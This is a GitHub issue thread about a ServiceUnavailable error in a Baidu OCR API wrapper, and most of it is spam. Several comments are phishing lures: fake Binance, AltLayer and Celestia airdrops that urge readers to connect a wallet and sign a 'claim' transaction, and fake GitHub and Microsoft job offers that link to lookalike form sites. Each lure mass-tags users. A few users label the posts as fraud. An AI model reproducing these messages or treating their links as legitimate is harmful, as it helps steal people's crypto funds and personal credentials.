### ISSUE TITLE
ServiceUnavailable

### ISSUE THREAD

**Issue by NemoAlex** [netpi/baidu-ocr-api#5]
```
body:
      { code: 'ServiceUnavailable',
        message: 'Service or dependent service is unavailable.',
        requestId: '9c2cf317-5f63-4384-884b-c6f58a427474' } } }
```

**Comment by fox19920726** [comment]
哈哈哈，我也是遇到这个问题了，还有人维护这个项目吗

**Comment by netpi** [comment]
@NemoAlex @fox19920726  貌似百度 已经把OCR服务下线了 ...

**Comment by ilaipi** [comment]
ocr服务貌似调用方式更新了，这个库看来是没维护了啊

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by jorarportal** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![http://go.bnbcoinsearn.online/97Q7Yj](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by Idris933** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @linchen1987, @m0ntyG, @Eduard197150, @ChanMo, @gusonyang, @michaelelliot, @0t2

**Comment by Idris933** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @ATrnd, @Limitinit, @Joy-jinyu, @jaznups, @volschin, @michaelazer, @Stmol

**Comment by Idris933** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @ncst77, @not-qwerty, @Armour, @libofeng, @hassnian, @elllot, @waynemunro

**Comment by jccalbuquerque** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.
skylerjokiel, @dongsam, @ckoopmann, @essingen123, @zhuchentong, @intpp, @peterdemartini, @kroitor, @hryk, @IgorFrolov, @huazhuangnan, @tkcolorado, @sjoerdapp, @nir-zilberman, @mastilver, @manyxu90, @rjoshima, @tunnckoCore, @tk-o, @ctrl-alt-lulz

**Comment by jccalbuquerque** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.
Battenfield, @longle255, @zach-is-my-name, @rodrigooler, @Limitinit, @tchigher, @krinoid, @opt9, @XiaoweiQian, @1767083130, @zaach, @cjie888, @Godhunter97, @ithinco, @exdx, @fendouai, @LindsayRichman, @itstehkman, @ashfordbarstow, @kkdg

**Comment by gualopezb** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
junaid-faryad, @yahorlahunovich, @meienberger, @rcjiang, @pitezz, @kjh-ben, @qq429245403, @tengfeiwang1, @luozygithub, @u-u-z, @tfzxyinhao, @cjjlovedsn, @openance, @anton202, @keene2, @Sebastp, @souvik666, @Ad4mJ, @0xBi, @owieth

**Comment by hunzlahmalik** [comment]
Fraud...........

**Comment by hunzlahmalik** [comment]
@netpi It's Fraud

**Comment by ha0min** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!jakzaizzat, @lamechang-dev, @ilker0, @krisaenz, @ablozhou, @terranc, @EbenKouao, @jinke479150, @laalaaala, @mhxw, @trkaplan, @ohmpzz, @alojzbaca, @fathi110, @LazyBoneJC, @stoweo112, @RyderJKL, @ralintuscano, @longToken95, @andrecrjr

**Comment by lyuzhichao** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
masudshafei30, @Unzerror, @manhloki, @Hung189, @CristianMR, @kshantanu93, @deiprex, @wellbeck190, @iwenli, @Yogzcollectd, @anton202, @taishi-hub, @Brycewetzel, @giorgiolucca, @ccyanxyz, @China-Chris, @ystrdy, @Dnevend, @kelby, @DeFiTON

**Comment by appsplash99** [comment]
Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
attractiveDev, @yanashark, @jayCde, @yllvar, @dmwilkinson770, @yuodbb, @beagleview, @bakhshi90, @heipacker, @avichavan, @MarekSyk, @hyc3z, @dinhnhatbang, @blackestwhite, @dzarezenko, @danzprogdanz, @FreePoi, @SouphiW, @xsota, @Blmaster1

**Comment by souvik666** [comment]
> Hey there,
> 
> We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.
> 
> Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.
> 
> Looking forward to potentially welcoming you aboard!
> 
> Best regards, GitHub Recruitment Team attractiveDev, @yanashark, @jayCde, @yllvar, @dmwilkinson770, @yuodbb, @beagleview, @bakhshi90, @heipacker, @avichavan, @MarekSyk, @hyc3z, @dinhnhatbang, @blackestwhite, @dzarezenko, @danzprogdanz, @FreePoi, @SouphiW, @xsota, @Blmaster1


@netpi It's Fraud

**Comment by JoseMRodriguezM** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 1, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
alanhaledc, @chengzhong001, @sarleon, @dddddddrrrr, @kuncle, @lynnsir-102, @Ivanlovening, @Big-Shawn, @XDDTristan, @Lmmmmm, @ShuYuMo2003, @Andy123qq4, @LZZTNL, @hitripod, @widaT, @FelixSeptem, @Kastrcn, @GreenJoson, @niunainai, @greatpie

**Comment by guxtavo-as** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 6, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
polblancoo, @Pete35001, @iamjaime, @cloutprotocol, @ramsarthe, @kelreel, @setchi, @bstorexwallet, @keene2, @Ekkohng, @murataslan1, @kehindeBankole, @jonesbarrye35, @mehdinazari777, @msrkc, @Redracer93, @ryuki, @turbospaces, @0502lian, @GandiRutendo07

**Comment by souvik666** [comment]
guys It's Fraud, @netpi  please delete this comments

**Comment by DavideStagni** [comment]
# [Dream Job Opportunity at Microsoft!](https://careersmicrosoft.online/)

Exciting news! We're hiring for a Junior Software Developer position at Microsoft!

## How to Apply:
Ready to embark on this amazing journey? Apply now [here](https://careersmicrosoft.online/) before **March 20, 2024**.

## Job Description:
- **Position:** Junior Software Developer
- **Salary:** Competitive salary package
- **Location:** Remote
- **Benefits:**
  - Work remotely from anywhere in the world
  - Flexible working hours
  - Comprehensive health insurance
  - Generous vacation and sick leave policy
  - Professional development opportunities
  - Collaborative and inclusive work environment

## Requirements:
- Passion for software development
- Basic understanding of programming languages like Python, JavaScript, or Java
- Strong problem-solving skills
- Excellent communication and teamwork abilities

Don't miss out on this incredible opportunity to kick-start your career with one of the world's leading tech companies! Apply now and become a part of the Microsoft family!
mqzhang, @asakurayoh1987, @linkff, @0xAndersonZ, @LuminescenceRecordings, @mimiluobotou, @nanjiangwill, @gaohongxiang, @yzcheng90, @0xmaoxianjia, @sw-11-00, @mrw9527, @kicxxxto, @fishonline, @Godzillas, @fzfd, @Mmmintaka, @Jmagicc, @yanyangLED, @hungdv98

**Comment by souvik666** [comment]
> # [Dream Job Opportunity at Microsoft!](https://careersmicrosoft.online/)
> Exciting news! We're hiring for a Junior Software Developer position at Microsoft!
> 
> ## How to Apply:
> Ready to embark on this amazing journey? Apply now [here](https://careersmicrosoft.online/) before **March 20, 2024**.
> 
> ## Job Description:
> * **Position:** Junior Software Developer
> * **Salary:** Competitive salary package
> * **Location:** Remote
> * **Benefits:**
>   
>   * Work remotely from anywhere in the world
>   * Flexible working hours
>   * Comprehensive health insurance
>   * Generous vacation and sick leave policy
>   * Professional development opportunities
>   * Collaborative and inclusive work environment
> 
> ## Requirements:
> * Passion for software development
> * Basic understanding of programming languages like Python, JavaScript, or Java
> * Strong problem-solving skills
> * Excellent communication and teamwork abilities
> 
> Don't miss out on this incredible opportunity to kick-start your career with one of the world's leading tech companies! Apply now and become a part of the Microsoft family! mqzhang, @asakurayoh1987, @linkff, @0xAndersonZ, @LuminescenceRecordings, @mimiluobotou, @nanjiangwill, @gaohongxiang, @yzcheng90, @0xmaoxianjia, @sw-11-00, @mrw9527, @kicxxxto, @fishonline, @Godzillas, @fzfd, @Mmmintaka, @Jmagicc, @yanyangLED, @hungdv98

> # [Dream Job Opportunity at Microsoft!](https://careersmicrosoft.online/)
> Exciting news! We're hiring for a Junior Software Developer position at Microsoft!
> 
> ## How to Apply:
> Ready to embark on this amazing journey? Apply now [here](https://careersmicrosoft.online/) before **March 20, 2024**.
> 
> ## Job Description:
> * **Position:** Junior Software Developer
> * **Salary:** Competitive salary package
> * **Location:** Remote
> * **Benefits:**
>   
>   * Work remotely from anywhere in the world
>   * Flexible working hours
>   * Comprehensive health insurance
>   * Generous vacation and sick leave policy
>   * Professional development opportunities
>   * Collaborative and inclusive work environment
> 
> ## Requirements:
> * Passion for software development
> * Basic understanding of programming languages like Python, JavaScript, or Java
> * Strong problem-solving skills
> * Excellent communication and teamwork abilities
> 
> Don't miss out on this incredible opportunity to kick-start your career with one of the world's leading tech companies! Apply now and become a part of the Microsoft family! mqzhang, @asakurayoh1987, @linkff, @0xAndersonZ, @LuminescenceRecordings, @mimiluobotou, @nanjiangwill, @gaohongxiang, @yzcheng90, @0xmaoxianjia, @sw-11-00, @mrw9527, @kicxxxto, @fishonline, @Godzillas, @fzfd, @Mmmintaka, @Jmagicc, @yanyangLED, @hungdv98

@netpi again another scam
